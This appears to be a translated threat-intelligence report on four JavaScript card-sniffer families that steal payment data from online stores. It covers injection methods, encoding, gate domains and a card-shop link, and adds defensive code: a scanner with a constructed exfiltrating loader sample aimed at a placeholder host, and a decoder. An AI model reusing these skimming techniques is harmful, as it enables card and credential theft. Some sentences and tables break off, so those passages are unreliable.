Almost all of us use online stores, which means that sooner or later we risk becoming victims of JavaScript sniffers: special code that attackers inject into a website to steal users' bank card data, addresses, logins and passwords.
Almost 400,000 users of the British Airways website and mobile app have already been affected by sniffers, as have visitors to the British website of the sportswear giant FILA and the American ticket distributor Ticketmaster. PayPal, Chase Paymentech, USAePay, Moneris and many other payment systems were affected.
Viktor Okorokov, an analyst at Group-IB Threat Intelligence, explains how sniffers infiltrate website code and steal payment data, and which CMSs they attack.
A hidden threat
It so happened that for a long time JS sniffers stayed out of sight of antivirus analysts, and banks and payment systems did not regard them as a serious threat. And completely in vain. Group-IB experts
Let us look in detail at the four sniffer families studied in this report.
The ReactGet family
Sniffers of the ReactGet family are used to steal bank card data on online shopping sites. A sniffer can work with a large number of payment systems used on a site: one parameter value corresponds to one payment system, and the individual versions found can be used to steal credentials as well as to steal bank card data from the payment forms of several payment systems at once, in the manner of a so-called universal sniffer. It was found that in some cases the attackers carry out phishing attacks against online store administrators in order to gain access to the site's admin panel.
The campaign using this sniffer family began in May 2017; sites running the Magento, Bigcommerce and Shopify CMS platforms were attacked.
How ReactGet is embedded in the code of an online store
In addition to the "classic" embedding of a script via a link, operators of the ReactGet sniffer family use a special technique: JavaScript code checks whether the user's current address satisfies certain criteria. The malicious code is executed only if the current URL contains the substring Checkout or onestepcheckout, onepage/, out/onepag, checkout/one, ckout/one. Thus the sniffer code runs exactly when the user proceeds to pay for the purchase and enters payment data into the form on the site.
This sniffer uses a non-standard technique. The victim's payment and personal data are collected together and encoded with base64, and the resulting string is then used as a parameter in a request to the attackers' site. Most often the path to the gate imitates a JavaScript file, e.g. resp.js, data.js and so on, but links to image files, GIF and JPG, are also used. The peculiarity is that the sniffer creates an image object 1 by 1 pixel in size and uses the link obtained earlier as its src parameter. That is, for the user such a request looks in traffic like a request for an ordinary image. A similar technique was used in the ImageID sniffer family. In addition, the 1-by-1 pixel image technique is used in many legitimate online analytics scripts, which can also mislead the user.
Version analysis
Analysis of the domains used by the ReactGet sniffers revealed a large number of different versions of this sniffer family. The versions differ in the presence or absence of obfuscation, and in addition, each sniffer is designed for a specific payment system that processes bank card payments for online stores. Having enumerated the parameter value corresponding to the version number, Group-IB specialists obtained a full list of available sniffer variants, and from the names of the form fields each sniffer looks for in the page code, they identified the payment systems each sniffer targets.
List of sniffers and their payment systems
(The compromised-link column of this table did not survive extraction, so the table cannot be reproduced row by row. The payment systems it names are: Authorize.Net, eWAY Rapid, Adyen, USAePay, Moneris, PayPal, Sage Pay, Verisign, Stripe, Realex, LinkPoint, DataCash, Braintree, Chase Paymentech, PsiGate, Cybersource, ANZ eGate, First Data Global Gateway, Westpac PayWay, PayFort, EBizCharge, PayPal Payflow Pro and QuickBooks Merchant Services; a few further entries are garbled beyond recovery.)
Password sniffer
One of the advantages of JavaScript sniffers running on the client side of a website is their versatility: malicious code embedded in a site can steal any type of data, whether payment data or the login and password of a user account. Group-IB specialists found a sample of a ReactGet family sniffer designed to steal users' e-mail addresses and passwords on a site.
Intersection with the ImageID sniffer
During analysis of one of the infected stores, it was found that its site had been infected twice: in addition to malicious code of the ReactGet family, sniffer code of the ImageID family was found. This overlap may indicate that the operators behind both sniffers use similar techniques for injecting malicious code.
Universal sniffer
Analysis of one of the domain names associated with the ReactGet sniffer infrastructure showed that the same user had registered three other domain names. These three domains imitated the domains of real sites and had previously been used to host sniffers. When analysing the code of three legitimate sites, an unknown sniffer was found, and further analysis showed that it was an improved version of the ReactGet sniffer. All previously tracked versions of this sniffer family targeted a single payment system, i.e. each payment system required a special version of the sniffer. In this case, however, a universal version of the sniffer was found, capable of stealing data from forms related to 15 different payment systems and e-commerce modules for making online payments.
So, at the start of its work, the sniffer searched for the basic fields containing the victim's personal information: full name, physical address, phone number.
The sniffer then searched for 15 different prefixes corresponding to various payment systems and online payment modules.
Next, the victim's personal data and payment data were collected together and sent to a site controlled by the attacker: in this case, two versions of the ReactGet universal sniffer were found, located on two different compromised sites. Both versions, however, sent the stolen data to the same compromised site, zoobashop.com.
Analysis of the prefixes the sniffer used to search for fields containing the victim's payment data allowed us to determine that this sniffer sample targeted the following payment systems:
- Authorize.Net
- Verisign
- First Data
- USAePay
- Stripe
- PayPal
- ANZ eGate
- Braintree
- DataCash (MasterCard)
- Realex Payments
- PsiGate
- Heartland Payment Systems
What tools are used to steal payment data?
The first tool, discovered during analysis of the attackers' infrastructure, is used to obfuscate the malicious scripts that steal bank card data. A bash script using the CLI of this project was found on one of the attackers' servers.
The second tool found is designed to generate the code responsible for loading the main sniffer. This tool generates JavaScript code that checks whether the user is on a checkout page by searching the user's current address for the strings Checkout, cart and so on, and if the result is positive, the code loads the main sniffer from the attackers' server. To hide the malicious activity, all strings, including the test strings used to recognise the checkout page and the link to the sniffer, are base64-encoded.
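The loader behaviour described here and in the embedding section above (a URL gate on checkout-related substrings, trigger strings hidden in base64, a base64 payload in the src of a 1-by-1 image) can be turned into a static triage check for scripts found on a store's pages. The following is an added example, not code from the report or from the attackers' tooling; both script samples are constructed and inert, the finding labels are this example's own, and gate.invalid is a placeholder host.

```javascript
// Added example: static triage of an inline script for the ReactGet-style loader
// indicators described in the report. Both script samples below are constructed
// and never executed; 'gate.invalid' is a placeholder, not a real gate.

// Substrings the report says the loader looks for in the current URL.
const TRIGGER_WORDS = ['checkout', 'onestep', 'onepage', 'cart'];

// Decode quoted literals that look like base64 and yield printable ASCII.
// The second ReactGet tool hides its trigger strings this way.
function decodeBase64Literals(source) {
  const decoded = [];
  const literal = /['"]([A-Za-z0-9+/]{6,}={0,2})['"]/g;
  let match;
  while ((match = literal.exec(source)) !== null) {
    const text = Buffer.from(match[1], 'base64').toString('utf8');
    if (/^[\x20-\x7e]+$/.test(text)) decoded.push(text);
  }
  return decoded;
}

// Return the list of indicators found in one script. Each finding is a label;
// combinations matter more than any single hit (see isSuspicious).
function scanScript(source) {
  const findings = [];
  const lower = source.toLowerCase();

  // 1. Plain-text URL gate: the script reads the current address and names a checkout word.
  if (/location\.(href|pathname)/.test(source) &&
      TRIGGER_WORDS.some((w) => lower.includes(w))) {
    findings.push('url-gate:plain');
  }

  // 2. The same gate with the trigger words hidden in base64 literals.
  for (const text of decodeBase64Literals(source)) {
    const hit = TRIGGER_WORDS.find((w) => text.toLowerCase().includes(w));
    if (hit) findings.push(`url-gate:base64:${hit}`);
  }

  // 3. Image beacon: an Image object whose src is assembled at runtime
  //    (concatenation or btoa), the 1-by-1 pixel trick the report describes.
  if (/new\s+Image\s*\(/.test(source) &&
      /\.src\s*=\s*[^;]*(\+|btoa\s*\()/.test(source)) {
    findings.push('exfil:image-beacon');
  }
  return findings;
}

// A URL gate alone is normal for analytics code on a checkout page; require a gate
// together with an exfiltration indicator before raising an alert.
function isSuspicious(findings) {
  return findings.some((f) => f.startsWith('url-gate')) &&
         findings.some((f) => f.startsWith('exfil'));
}

// Constructed sample in the style of the generated loader: triggers hidden in
// base64 ('Y2hlY2tvdXQ=' is "checkout", 'Y2FydA==' is "cart"), beacon to a
// placeholder host. The payload assembly is deliberately omitted.
const LOADER_SAMPLE = `
var u = window.location.href;
if (u.indexOf(atob('Y2hlY2tvdXQ=')) > -1 || u.indexOf(atob('Y2FydA==')) > -1) {
  var p = new Image(1, 1);
  p.src = 'https://gate.invalid/resp.js?' + btoa(payload);
}`;

// Constructed benign sample: legitimate analytics also looks at the checkout URL
// and also loads a pixel, but builds no dynamic src from page data.
const BENIGN_SAMPLE = `
var img = new Image();
img.src = '/static/pixel.gif';
if (window.location.pathname.indexOf('checkout') === 0) {
  dataLayer.push({ event: 'checkout_view' });
}`;
```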
Phishing attacks
Analysis of the attackers' network infrastructure showed that the criminal group often uses phishing to gain access to the admin panel of a target online store. The attackers register a domain visually similar to the store's domain and then deploy a fake Magento admin panel login form on it. If successful, the attackers gain access to the Magento CMS admin panel, which lets them edit the site's components and deploy a sniffer to steal credit card data.
Infrastructure
The G-Analytics family
This sniffer family is used to steal customers' cards from online stores. The first domain name used by the group was registered in April 2016, which may indicate that the group began operating in mid-2016.
In the current campaign, the group uses domain names that imitate real services such as Google Analytics and jQuery, masking sniffer activity with legitimate-looking scripts and domain names similar to legitimate ones. Sites running the Magento CMS were attacked.
How G-Analytics is embedded in the code of an online store
A distinctive feature of this family is the use of several methods of stealing payment data. In addition to the classic injection of JavaScript into the client side of the site, the criminal group also used code-injection techniques on the server side, namely PHP scripts that process data entered by the user. This technique is dangerous because it makes it harder for third-party researchers to detect the malicious code. Group-IB specialists found a version of the sniffer embedded in the site's PHP code, using the domain dittm.org as a gate.
An early version of the sniffer was also found that uses the same domain, dittm.org, to collect stolen data, but this version is designed for installation on the client side of the online store.
Later the group changed tactics and began to pay more attention to hiding the malicious activity and to camouflage.
In early 2017 the group began using the domain jquery-js.com, disguised as a jQuery CDN: when visiting the malicious site, the user is redirected to the legitimate site jquery.com.
And in mid-2018 the group adopted the domain name g-analytics.com and began disguising the sniffer's activity as the legitimate Google Analytics service.
Version analysis
Analysis of the domains used to store the sniffer code revealed that the site hosts a large number of versions, which differ in the presence of obfuscation and in the presence or absence of unreachable code added to the file to divert attention and hide the malicious code.
In total, six versions of the sniffer were identified on the site jquery-js.com. These sniffers send the stolen data to an address located on the same site as the sniffer itself, hxxps://jquery-js[.]com/latest/jquery.min.js:
- hxxps://jquery-js[.]com/jquery.min.js
- hxxps://jquery-js[.]com/jquery.2.2.4.min.js
- hxxps://jquery-js[.]com/jquery.1.8.3.min.js
- hxxps://jquery-js[.]com/jquery.1.6.4.min.js
- hxxps://jquery-js[.]com/jquery.1.4.4.min.js
- hxxps://jquery-js[.]com/jquery.1.12.4.min.js
Later the domain g-analytics.com, used by the group in attacks since mid-2018, serves as a repository for a larger number of sniffers. In total, 16 different versions of the sniffer were found. In this case, the gate for sending stolen data was disguised as a link to a GIF image: hxxp://g-analytics[.]com/__utm.gif?v=1&_v=j68&a=98811130&t=pageview&_s=1&sd=24-bit&sr=2560×1440&vp=2145×371&je=0&_u=AACAAEAB~&jid=1841704724&gjid=877686936&cid=1283183910.1527732071:
- hxxps://g-analytics[.]com/libs/1.0.1/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.10/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.11/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.12/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.13/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.14/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.15/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.16/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.3/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.4/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.5/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.6/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.7/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.8/analytics.js
- hxxps://g-analytics[.]com/libs/1.0.9/analytics.js
- hxxps://g-analytics[.]com/libs/analytics.js
Monetisation of stolen data
The criminal group monetises the stolen data by selling cards through a specially created underground store that provides services to carders. Analysis of the domains used by the attackers allowed us to establish that google-analytics.cm was registered by the same user as the domain cardz.vc. The domain cardz.vc refers to the store selling stolen bank cards Cardsurfs (Flysurfs), which gained popularity back in the days of the AlphaBay underground marketplace as a store selling bank cards stolen using a sniffer.
Analysing the domain analytical.is, located on the same server as the domains used by the sniffers to collect stolen data, Group-IB specialists found a file containing logs of cookie theft, which appears to have been abandoned later by the malware developer. One of the log entries contained the domain iozoz.com, previously used in one of the sniffers active in 2016. Presumably this domain was used earlier by the attacker to collect cards stolen using a sniffer. The domain was registered to an e-mail address (redacted in the source), which was also used to register the domains cardz.su and cardz.vc, related to the Cardsurfs card shop.
Based on the data obtained, it can be assumed that the G-Analytics sniffer family and the underground bank card store Cardsurfs are run by the same people, and the store is used to sell bank cards stolen using the sniffer.
Infrastructure
Domain | Date of detection/appearance |
---|---|
iozoz.com | 08.04.2016 |
dittm.org | 10.09.2016 |
jquery-js.com | 02.01.2017 |
g-analytics.com | 31.05.2018 |
google-analytics.is | 21.11.2018 |
analytical.to | 04.12.2018 |
google-analytics.to | 06.12.2018 |
google-analytics.cm | 28.12.2018 |
analytical.is | 28.12.2018 |
google-analytics.cm | 17.01.2019 |
The Illum family
Illum is a sniffer family used to attack online stores running the Magento CMS. In addition to injecting malicious code, operators of this sniffer also deploy full-fledged fake payment forms that send data to gates controlled by the attackers.
Analysis of the network infrastructure used by the operators of this sniffer revealed a large number of malicious scripts, exploits, fake payment forms, and a collection of samples of malicious sniffers from competitors. Based on the dates of appearance of the domain names used by the group, it can be assumed that the campaign began in late 2016.
How Illum is embedded in the code of an online store
The first versions of the sniffer discovered were embedded directly in the code of the compromised site. The stolen data was sent to cdn.illum[.]pw/records.php; the gate was base64-encoded.
Later, a packed version of the sniffer was found that uses a different gate: records.nstatistics[.]com/records.php.
Based on
Analysis of the attackers' site
Group-IB specialists discovered and analysed the site the criminal group used to store its tools and collect stolen data.
Among the tools found on the attackers' server were scripts and exploits for privilege escalation in Linux: for example, the Linux Privilege Escalation Check Script developed by Mike Czumak, as well as an exploit for CVE-2009-1185.
The attackers used two exploits directly to attack online stores:
Also, during analysis of the server, various samples of sniffers and fake payment forms were found, which the attackers used to collect payment data from compromised sites. As can be seen from the list below, some scripts were created individually for each compromised site, while a universal solution was used for certain CMSs and payment gateways. For example, the scripts segapay_standart.js and segapay_onpage.js are designed for deployment on sites using the Sage Pay payment system.
List of scripts for various payment gateways
(The script-name column of this table did not survive extraction. The payment gateway column contains the following endpoints, each used by one or more of the scripts: //request.payrightnow[.]cf/checkpayment.php, //request.payrightnow[.]cf/alldata.php, //cdn.illum[.]pw/records.php, //payrightnow[.]cf/?payment= and //paymentnow[.]tk/?payment=.)
The host paynow[.]tk, used as a gate in the script pay_forminsite.js, was found as a subjectAltName in several certificates related to the CloudFlare service. In addition, the script evil.js was located on the host. Judging by the script's name, it could be used as part of exploiting CVE-2016-4010, which makes it possible to inject malicious code into the footer of a page on a site running the Magento CMS. This script used the host request.requestnet[.]tk as a gate, which uses a certificate identical to that of the host paynow[.]tk.
Fake payment forms
The figure below shows an example of a card data entry form. This form was used to infiltrate an online store and steal card data.
The following figure shows an example of a fake PayPal payment form used by the attackers to infiltrate sites with this payment method.
Infrastructure
Domain | Date of detection/appearance |
---|---|
cdn.illum.pw | 27/11/2016 |
records.nstatistics.com | 06/09/2018 |
request.payrightnow.cf | 25/05/2018 |
paynow.tk | 16/07/2017 |
payline.tk | 01/03/2018 |
paypal.cf | 04/09/2017 |
requestnet.tk | 28/06/2017 |
The CoffeMokko family
The CoffeMokko sniffer family, designed to steal bank cards from online store users, has been in use since at least May 2017. Presumably the operators of this sniffer family are the criminal group Group 1, described by RiskIQ specialists in 2016. Sites running CMSs such as Magento, OpenCart, WordPress, osCommerce and Shopify were attacked.
How CoffeMokko is embedded in the code of an online store
Operators of this family create a unique sniffer for each infection: the sniffer file is located in the src or js directory on the attackers' server. Embedding into the site code is done via a direct link to the sniffer.
The sniffer code hardcodes the names of the form fields from which data is to be stolen. The sniffer also checks whether the user is on the checkout page by comparing a list of keywords against the user's current address.
Some discovered versions of the sniffer were obfuscated and contained an encrypted string in which the main array of resources was stored: it held the names of form fields for various payment systems, as well as the address of the gate to which the stolen data should be sent.
The stolen payment data was sent to a script on the attackers' server at the path /savePayment/index.php or /tr/index.php. Presumably this script is used to forward data from the gate to the main server, which consolidates data from all the sniffers. To hide the transmitted data, all of the victim's payment information is base64-encoded, after which several character substitutions are performed:
- the character "e" is replaced with ":"
- the character "w" is replaced with "+"
- the character "o" is replaced with "%"
- the character "d" is replaced with "#"
- the character "a" is replaced with "-"
- the character "7" is replaced with "^"
- the character "h" is replaced with "_"
- the character "T" is replaced with "@"
- the character "0" is replaced with "/"
- the character "Y" is replaced with "*"
As a result of the character substitutions, the base64-encoded data cannot be decoded without performing the reverse transformation.
This is what a fragment of the un-obfuscated sniffer code looks like:
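The substitution table above can be reversed mechanically, with one caveat worth knowing when triaging captured traffic: two of the wire characters, "+" and "/", are themselves valid base64 characters, so a naive reversal can silently yield wrong but plausible-looking data. The following is an added example (not the sniffer's code and not Group-IB's tooling) that decodes a captured string both naively and exhaustively; the sample strings are constructed, and the forward transform is reconstructed from the description solely to build test vectors.

```javascript
// Added example: reversing the CoffeMokko exfiltration encoding described in the
// report (base64, then ten single-character substitutions). Inputs are constructed.

// Substitution table as given in the report: base64 character -> wire character.
const SUBSTITUTIONS = [
  ['e', ':'], ['w', '+'], ['o', '%'], ['d', '#'], ['a', '-'],
  ['7', '^'], ['h', '_'], ['T', '@'], ['0', '/'], ['Y', '*'],
];
const REVERSE = new Map(SUBSTITUTIONS.map(([plain, wire]) => [wire, plain]));

// Forward transform, reconstructed from the description and used here only to
// build test vectors. No output character is also an input character, so the
// order of the replacements does not matter.
function coffeMokkoEncode(text) {
  let s = Buffer.from(text, 'utf8').toString('base64');
  for (const [plain, wire] of SUBSTITUTIONS) s = s.split(plain).join(wire);
  return s;
}

// Naive reverse: undo every substitution and base64-decode. Two wire characters
// are ambiguous because '+' and '/' are themselves base64 characters: a wire '+'
// may be an original '+' or a substituted 'w', a wire '/' an original '/' or a
// substituted '0'. The number of such positions is returned with the text.
function coffeMokkoDecode(wire) {
  let ambiguous = 0;
  let b64 = '';
  for (const ch of wire) {
    if (ch === '+' || ch === '/') ambiguous += 1;
    b64 += REVERSE.has(ch) ? REVERSE.get(ch) : ch;
  }
  return { text: Buffer.from(b64, 'base64').toString('utf8'), ambiguous };
}

// Exhaustive reverse: try both readings of every ambiguous position and keep the
// decodings that are printable ASCII (form data is). 2^n combinations, so cap n.
function decodeCandidates(wire, maxAmbiguous = 12) {
  const chars = [...wire];
  const positions = [];
  const base = chars.map((ch, i) => {
    if (ch === '+' || ch === '/') positions.push(i);
    return REVERSE.has(ch) ? REVERSE.get(ch) : ch;
  });
  if (positions.length > maxAmbiguous) {
    throw new RangeError(`${positions.length} ambiguous positions, cap is ${maxAmbiguous}`);
  }
  const candidates = new Set();
  for (let mask = 0; mask < (1 << positions.length); mask += 1) {
    const attempt = base.slice();
    positions.forEach((pos, bit) => {
      // Bit set: read the wire character as an original base64 '+' or '/'.
      if (mask & (1 << bit)) attempt[pos] = chars[pos];
    });
    const text = Buffer.from(attempt.join(''), 'base64').toString('utf8');
    if (/^[\x20-\x7e]*$/.test(text)) candidates.add(text);
  }
  return [...candidates];
}
```

For the constructed string "a=?&b=1" the naive decoder returns "a=4&b=1" with two ambiguous positions, while the exhaustive decoder returns both readings, which is why the ambiguity count should never be ignored.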
Infrastructure Analysis
In early campaigns, the attackers registered domain names similar to those of legitimate online stores. Their domain could differ from the legitimate one by a single character or a different TLD. The registered domains were used to store the sniffer code, a link to which was embedded in the store's code.
The group also used domain names resembling popular jQuery plugins (slickjs[.]org for sites using the slick.js plugin) and payment gateways (sagecdn[.]org for sites using the Sage Pay payment system).
Later the group began creating domains whose names had nothing to do with the store or the store's subject matter.
Each domain corresponded to a site on which the /js or /src directory was created. The sniffer scripts were stored in this directory: one sniffer for each new infection. The sniffer was embedded in the site code via a direct link, but in rare cases the attackers modified one of the site's files and added malicious code to it.
Code analysis
First obfuscation algorithm
In some discovered samples of this family's sniffers, the code was obfuscated and contained the encrypted data needed for the sniffer to operate: in particular, the sniffer's gate address, the list of payment form fields and, in some cases, the code of a fake payment form. In the code inside the function, the resources were encrypted using XOR with a key passed as an argument to the same function.
By decrypting the string with the appropriate key, unique to each sample, one can obtain a string containing all the sniffer's code strings separated by a delimiter.
Second obfuscation algorithm
In later samples of this family's sniffers, a different obfuscation mechanism was used: in this case, the data was encrypted using a self-written algorithm. The string containing the encrypted data needed for the sniffer to operate was passed as an argument to the decryption function.
Using the browser console, one can decrypt the encrypted data and obtain an array containing the sniffer's resources.
Connection with early MageCart attacks
During analysis of the domains used by the group as gates for collecting stolen data, it was found that this domain hosted credit card theft tools identical to those used by Group 1, one of the first groups,
Two files were found on the CoffeMokko sniffer gate:
- mage.js: a file containing Group 1 sniffer code with the gate address js-cdn.link
- mag.php: a PHP script responsible for collecting the data stolen by the sniffer
Contents of the mage.js file
It was also established that the earliest domains used by the group behind the CoffeMokko sniffer family were registered on May 17, 2017:
- link-js[.]link
- info-js[.]link
- track-js[.]link
- map-js[.]link
- smart-js[.]link
The format of these domain names matches the Group 1 domain names used in the 2016 attacks.
Based on the findings, it can be assumed that there is a connection between the operators of the CoffeMokko sniffers and the criminal group Group 1. Presumably the CoffeMokko operators could have borrowed tools and software from their predecessors to steal cards. However, it is more likely that the criminal group using the CoffeMokko sniffer family is the same people who carried out the Group 1 attacks. After the publication of the first report on the criminal group's activities, all of its domain names were blocked and the tools were studied and described in detail. The group was forced to take a break, refine its internal tools and rewrite the sniffer code in order to continue the attacks and remain undetected.
Infrastructure
Source: www.habr.com